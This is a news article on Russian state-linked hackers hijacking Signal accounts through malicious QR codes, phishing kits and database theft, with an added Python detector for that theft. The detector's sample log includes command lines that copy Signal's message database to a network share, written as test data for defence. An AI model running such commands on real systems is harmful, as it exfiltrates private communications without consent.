CyberSecurity SEE

Russian Hackers Target Secure Messaging Apps

Russian state-sponsored hackers are intensifying their efforts to compromise Signal messenger accounts, particularly targeting Ukrainian military personnel, government officials, and other influential figures. Cybersecurity experts have issued warnings that these attacks on Signal are part of a broader espionage campaign by Moscow to gain access to sensitive communications that could aid in their war efforts against Ukraine.

The widespread use of Signal among military members, politicians, journalists, and activists has made it a prime target for Russian hackers, according to a report from Google’s security team. While Signal is the main focus, other messaging platforms like WhatsApp and Telegram have also been subject to similar targeting tactics.

Ukrainian cybersecurity officials have previously warned that Russian hacker groups were exploiting weaknesses around Signal to gain access to government and defense officials’ communications. The hackers primarily use phishing attacks to deliver malware that allows them to spy on their victims.

One of the innovative techniques uncovered by Google involves exploiting Signal’s legitimate “linked devices” feature. Hackers have found ways to abuse this feature by crafting malicious QR codes that, when scanned by a target, give the attacker control over the victim’s Signal account, enabling real-time message interception.

Hackers distribute these malicious QR codes through various methods, including phishing campaigns, military-themed phishing pages targeting Ukrainian military personnel, and even linking Signal accounts from seized Ukrainian devices to attacker-controlled systems for intelligence gathering.

Russian state-affiliated hacking groups, such as Sandworm, UNC4221, and UNC5792, have been identified as key players in these cyber espionage campaigns. Sandworm, also known as APT44, has been instrumental in hijacking Signal accounts from battlefield devices. UNC4221 has developed a Signal phishing kit to mimic Ukrainian military applications and collect user data and geolocation information. UNC5792 has been modifying legitimate Signal group invites to redirect users to phishing links.

These threat actors have also developed methods to steal Signal database files from Android and Windows devices, using malware such as Wavesign and Chisel, PowerShell scripts, and even legitimate tools such as Robocopy for exfiltration.
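The database-theft pattern described above is something a defender can look for in endpoint telemetry. The following detector is an added example, not code from the article or from Google's report: it scans process-creation records for Robocopy, PowerShell or any other process referencing a Signal Desktop local store on Windows, and separately flags a store path appearing alongside a UNC share. The log format, the user and host names, and the assumption that Signal Desktop keeps its SQLite store under a `Signal\sql` directory in the user's roaming AppData are constructed for the example and should be adjusted to the real telemetry source and path layout in use.

```python
"""
Added example (not from the article or from Google's report): flag process
creation events in which Robocopy, PowerShell or another process reads the
Signal Desktop local database, the exfiltration pattern the article describes.

Assumptions (not stated on the page):
- Log lines are constructed, simplified records shaped like
  "<timestamp> user=<user> image=<exe path> cmd=<command line>".
- Signal Desktop's store lives under a "Signal\sql" directory in the user's
  roaming AppData (e.g. ...\AppData\Roaming\Signal\sql\db.sqlite); treat the
  exact layout as an assumption and adapt SIGNAL_STORE_RE to your environment.
"""
import re
from dataclasses import dataclass

# Matches "\Signal\sql" as a path component, or any .sqlite file under \Signal\.
# Case-insensitive because Windows paths are.
SIGNAL_STORE_RE = re.compile(
    r"\\Signal\\sql\b|\\Signal\\[^\s\"]*\.sqlite", re.IGNORECASE
)

# A UNC destination such as \\10.0.0.5\share in the command line.
UNC_RE = re.compile(r"\\\\[^\\\s]+\\")

# Images the article names as used for collection and exfiltration.
SUSPECT_IMAGES = {"robocopy.exe", "powershell.exe", "pwsh.exe"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) image=(?P<image>\S+) cmd=(?P<cmd>.*)$"
)


@dataclass
class Finding:
    ts: str
    user: str
    image: str  # base name of the executable, lower-cased
    reason: str


def parse_line(line):
    """Return the record's fields as a dict, or None for an unparseable line."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(record):
    """Return a reason string when the record matches a rule, else None."""
    image = record["image"].rsplit("\\", 1)[-1].lower()
    cmd = record["cmd"]
    touches_store = SIGNAL_STORE_RE.search(cmd) is not None
    if touches_store and image in SUSPECT_IMAGES:
        return f"{image} referencing Signal Desktop store"
    if touches_store and UNC_RE.search(cmd):
        return "Signal Desktop store referenced together with a UNC path"
    return None


def scan(lines):
    """Run every parseable line through classify() and collect the hits."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reason = classify(rec)
        if reason:
            image = rec["image"].rsplit("\\", 1)[-1].lower()
            findings.append(Finding(rec["ts"], rec["user"], image, reason))
    return findings


# Constructed sample telemetry: two benign lines, one benign robocopy backup,
# and three lines that should be flagged.
SAMPLE_LOG = [
    r"2025-02-20T10:01:02Z user=CORP\alice image=C:\Windows\System32\notepad.exe cmd=notepad.exe C:\Users\alice\notes.txt",
    r"2025-02-20T10:02:11Z user=CORP\alice image=C:\Users\alice\AppData\Local\Programs\signal-desktop\Signal.exe cmd=Signal.exe",
    r"2025-02-20T10:03:40Z user=CORP\alice image=C:\Windows\System32\Robocopy.exe cmd=robocopy.exe D:\Projects E:\Backup\Projects /MIR",
    r"2025-02-20T10:05:17Z user=CORP\alice image=C:\Windows\System32\Robocopy.exe cmd=robocopy.exe C:\Users\alice\AppData\Roaming\Signal\sql \\10.0.0.5\share\sig /E",
    r"2025-02-20T10:06:03Z user=CORP\alice image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd=powershell.exe -c Copy-Item C:\Users\alice\AppData\Roaming\Signal\sql\db.sqlite C:\Temp\d.bin",
    r"2025-02-20T10:07:55Z user=CORP\bob image=C:\Windows\System32\cmd.exe cmd=cmd.exe /c copy C:\Users\bob\AppData\Roaming\Signal\sql\db.sqlite \\10.0.0.5\share\b.db",
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.user} {f.image}: {f.reason}")
```

On the constructed sample the detector reports three findings (the Robocopy copy to a share, the PowerShell `Copy-Item`, and the `cmd.exe` copy to a UNC path) and ignores Signal's own process and the unrelated Robocopy backup. The second rule exists because a determined operator will not always use a tool from a fixed list, so the store path combined with a network destination is worth a separate alert.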

The evolving threat landscape driven by wartime demands for sensitive communications access poses a risk not only to Ukraine but potentially to other at-risk communities worldwide as well. Secure messaging applications like Signal, despite strong encryption, remain attractive targets for state-sponsored espionage.

In response to these threats, Signal has been enhancing its security features, urging users to take precautions like verifying QR codes, updating the app regularly, monitoring linked devices, and enabling multi-factor authentication. It is crucial for users, especially those in high-risk environments, to remain vigilant against phishing attacks and espionage techniques targeting secure messaging platforms like Signal.
